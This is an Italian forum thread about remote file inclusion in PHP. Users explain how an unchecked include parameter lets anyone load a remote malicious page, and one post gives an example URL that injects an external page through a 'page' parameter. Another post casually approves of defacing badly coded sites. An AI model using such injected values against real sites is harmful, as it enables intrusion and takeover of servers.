Controllo TRUE-FALSE su Submit

**piero.mac** · 03-02-2005, 00:55

[supersaibal]Originariamente inviato da Fabio Heller
Quell'articolo è criticabile, vedi l'esempio di inclusione in questa pagina
http://pro.html.it/view_forum.asp?id=572&idcat=31&pag=2

Se qualcuno defaccia certi siti fa bene: senza scendere in tecniche più complicate, basta ricordare che nelle versioni più recenti di PHP si può includere in quel modo una pagina remota, infatti file_exists lavora anche sulle pagine remote.
A volte la cattiva fama che PHP si guadagna è "merito" di chi lo usa alla leggera [/supersaibal]

Ora e' pure chiaro di chi e' il commento.....

**Fabio Heller** · 03-02-2005, 00:59

[supersaibal]Originariamente inviato da piero.mac
Ora e' pure chiaro di chi e' il commento.....

[/supersaibal]

No, quello è del mio compagno d'appartamento che mi ha segnalato l'articolo

**skidx** · 03-02-2005, 02:17

non avevo letto l'articolo in questione, quella perla me l'ero persa

gm · 03-02-2005, 10:06

Quell'articolo è ai limiti dello scandaloso

**Caleb** · 03-02-2005, 11:44

[supersaibal]Originariamente inviato da Fabio Heller
Quell'articolo è criticabile, vedi l'esempio di inclusione in questa pagina
http://pro.html.it/view_forum.asp?id=572&idcat=31&pag=2

Se qualcuno defaccia certi siti fa bene: senza scendere in tecniche più complicate, basta ricordare che nelle versioni più recenti di PHP si può includere in quel modo una pagina remota, infatti file_exists lavora anche sulle pagine remote.
A volte la cattiva fama che PHP si guadagna è "merito" di chi lo usa alla leggera [/supersaibal]

mi chiarite questo punto? come potrebbe essere possibile defacciare un sito grazie a quel tipo di inclusione? non si dovrebbe comunque avere accesso ai sorgenti del sito?

**troglos** · 03-02-2005, 11:53

[supersaibal]Originariamente inviato da Caleb
mi chiarite questo punto? come potrebbe essere possibile defacciare un sito grazie a quel tipo di inclusione? non si dovrebbe comunque avere accesso ai sorgenti del sito? [/supersaibal]

se non c'è un controllo dell'esistenza del file sul server chiunque dal browser puo' includere una pagina remota con codice maligno

esempio:
index.php?lang=it&page=http://www.sitoesterno.php/paginazozza

**Caleb** · 03-02-2005, 11:55

scusa ma in quel modo non lo vedrà defacciato solo lui?

**troglos** · 03-02-2005, 11:59

[supersaibal]Originariamente inviato da Caleb
scusa ma in quel modo non lo vedrà defacciato solo lui? [/supersaibal]

se il codice è maligno è fatto apposta per farti dei casini che manco immagini

si puo' prendere il controllo del database, e a quel punto è fatta

**piero.mac** · 03-02-2005, 12:07

[supersaibal]Originariamente inviato da Caleb
scusa ma in quel modo non lo vedrà defacciato solo lui? [/supersaibal]

In quel modo lo vedra' solo lui. Ma quello che puo' eseguire la pagina poi lo vedranno tutti gli altri.

Vai da creare un account ad eseguire comandi su OS... e tutto quello che potresti fare in una pagina php.

**troglos** · 03-02-2005, 12:10

[supersaibal]Originariamente inviato da piero.mac
In quel modo lo vedra' solo lui. Ma quello che puo' eseguire la pagina poi lo vedranno tutti gli altri.

Vai da creare un account ad eseguire comandi su OS... e tutto quello che potresti fare in una pagina php.

[/supersaibal]

piero quindi dimmi se sbaglio, a quel codice se si aggiunge un controllo sull'esistenza del file da includere SUL SERVER dovrebbe andare, no?

Discussione: Controllo TRUE-FALSE su Submit

Strumenti discussione

Ricerca discussione

Visualizza

Permessi di invio